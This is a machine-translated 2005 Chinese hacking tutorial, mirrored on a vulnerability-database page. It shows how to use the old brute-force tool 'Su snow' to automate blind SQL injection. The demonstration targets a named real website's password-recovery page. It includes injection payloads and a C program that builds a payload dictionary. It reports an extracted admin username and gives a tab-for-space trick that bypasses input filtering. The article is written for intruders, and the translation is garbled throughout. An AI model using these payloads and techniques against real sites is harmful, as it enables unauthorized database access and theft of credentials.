Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
myhack58佚名MYHACK58:6220054221
HistoryNov 02, 2005 - 12:00 a.m.

Su snow in a SQL Injection-vulnerability warning-the black bar safety net

2005-11-0200:00:00
佚名
www.myhack58.com
10
JSON

For the reader: the script invasion enthusiasts, the Black Controller fans
Pre-knowledge: su snow a basic method of use
Script kiddies: the Su snow is a small ficus in 2 0 0 0 year 1 0 month released a WEB-based detector, mainly used for some of the pages on the landing entrance for brute force, it turned out once we crack the mailbox is a good tool. Due to the now web pages are generally take a digital authentication code method, su snow will lose the current day style. But when we put it to use in SQL Injection, but will receive an unexpected effect. Can only say that the classic tools always a classic! this words as if a bit spare password mean it.

Su snow in the SQL Injection in the application

See this topic I believe everyone will feel very strange? Su snow turned out to not be eliminated, and now the latest scripting attacks and combined together? It is not difficult to make people believe it? Although hard to believe, but this after all is true. Here you do not hang everyone appetite, the official start!

First introduce back in the SQL Injection in the advantages:

◆It is a free product, poor poor Diamondback have to say is most welcome.
◆Supports a Proxy, including the need for authentication of the Proxy, which hides your own is very good.
◆Detection process is more stable, does not appear Feign Death phenomenon.
◆Favorites and IE integration, synchronization update.

We went on to analyze it in the SQL Injection in the application’s feasibility. SQL Injection refers to the injection we submitted the required query as a filter variable, in order to achieve cross-table, cross-database queries, in General we is injected into the submitted form items to implement, this method is not on the server leave any log, the security is very high, especially in the injected article search variables such as time, have other tools can not go beyond the advantages, because we can customize the injection of content, so you have more flexibility, but the Internet also does not automatically injected into the internal search variables related tools.

In view of its flexibility of use, I start with the domestic well-known hacking software download site: Small-Wind people to the site http://www.chinesehack.org for a target injection test. First came to this page:
http://www.chinesehack.org/member/getpass.asp
Here is the members password place, we entered the“’”Is determined, it will happen Http500 internal server error, the preliminary judgment here is the presence of SQL Injection vulnerabilities. Below is the manual guessing the table name and Field name, since there is a server on the variable special handling, we use other tools, such as NBSI2, AND WED, etc. are unable to guess, even if we construct the submission address such as: http://www.chinesehack.org/member/getpass.asp?usermane=1也是无法成功的 that exactly do?
We first guess the table name in the input box in the input:
1’ or exists(select * from admin) and ’1

When we get to the“Password Recovery the second step: please input your password question answer”the prompt, indicating the presence of the Admin of this field, if we enter“1’ or exists(select * from users) and ’1”occurred is returned Http500 internal server error, the description does not present Users with this table.
According to such a method, it is easy to give the Admin in the table User, and Pass these two fields.

Well, the key of the place up, we can now start guessing the account and password. Since there is no ready-made tool, we manually injected, guess detailed account passwords need to spend a very long time, we use the Su snow to help us! First of all, we need a contains injected into the statement of the dictionary, we can use a simple C language write directly to a generator injecting a statement of the program. Program source code is as follows:

#include<stdio. h>
#include<string. h>
#include<conio. h>
main()
{
FILE *fp;
char string1[1 0 0];
char string2[1 0 0];
int i,max,min;
printf(“enter inject words:\n”);
gets(string1);
printf(“enter the min number:”);
scanf(“%d”,&min);
printf(“enter the max number:”);
scanf(“%d”,&max);
getchar();
printf(“enter the last word:\n”);
gets(string2);
fp=fopen(“injection.txt”,“w”);
if(fp==NULL){printf(“can not open inject.txt”);exit(0);}
for(i=min;i<=max;i++)
{
fprintf(fp,“%s”,string1);
fprintf(fp,“%d”,i);
fprintf(fp,“%s”,string2);
fputc(’\n’,fp);
}
close(fp);
printf(“make successful!\ npress any key to exit”);getch();
}

We have it compiled connection into an executable file, first use this tool to generate an injection dictionary, the dictionary files for this tool in the current directory to generate Inject. txt content, as follows:

1’ or (select top 1 asc(mid(user,1,1)) from Admin)=3 2 and ’1
1’ or (select top 1 asc(mid(user,1,1)) from Admin)=3 3 and ’1
1’ or (select top 1 asc(mid(user,1,1)) from Admin)=3 4 and ’1

1’ or (select top 1 asc(mid(user,1,1)) from Admin)=1 2 2 and ’1

Wherein the ASCii range we can customize.
Well, the dictionary is ready, we open the back of the snow, into the http://www. chinesehack. org/member/getpass. asp page, and then extract the form, double-click the bottom left of the Username in the pop-up dialog box, select Directory, 填上我刚才生成的字典文件Inject.txt, and then OK. Select RUN in the menu Start, fill:“none of the user name, please register a new user!” This error flag, and then traced the snow will start running if not use su snow friends can go to http://www. netxeyes. com download about detailed usage help.

Soon we will get the user name of the first character of the ASCii code for 1 0 8, that is l, so that the user name first character we got, than the manual can be a lot faster! Similarly, we can get the rest of the characters, all I get is lilitou, you can refer yourself to guess out the result is not the same. Next is the password of the hack, the same principle, since his password is MD5 encrypted, I did not continue to break down, everyone gets also not much use, I’m here just to illustrate this method.
The following me the way the search variables of the injection method, first, in the query box, enter“’”, submitted to see if there is no injection vulnerability generally occurs internal server error or database error, etc. all indicate the presence of injection vulnerabilities. We thus constructed injection statements, the first input commonly used characters to make it a query to some information, such as input 1, and then start the injection:
1%’ and exists(select * from admin) and ’%1
Returns just the query to the information indicating the presence of this table, similarly:
1%’ and exists(select username from admin) and ’%1
Guess field, and the rest handed over to su snow settle in. In fact, su snow powerful function is that it returns the information of the judgment, it can be determined by the returned HTTP status code as 2 0 0 and 5 0 0, and 4 0 4, etc. to distinguish, and be able to solve some other software simply can not inject the variables, such as Tpye="hidden"variable, the more important is we have more flexibility to construct the injection statement.

In addition, we can use the Su snow to implantation by the Trim()function to filter the space of the variables, the method is to generate the dictionary use the TAB key instead of spaces, or generate the dictionary with UltraEdit to open the selected Hex edit, find 2 0 replaced with 0A(the ascii code for 1 0 for tab), with this dictionary can be successfully injected I online Down the power of Article Access version v3. 5 seems to just filter out the spaces.

Su snow, in fact there are many other usage, worthy is the classic black soft, enduring, everyone play to the imagination to develop it’s other functions!

JSON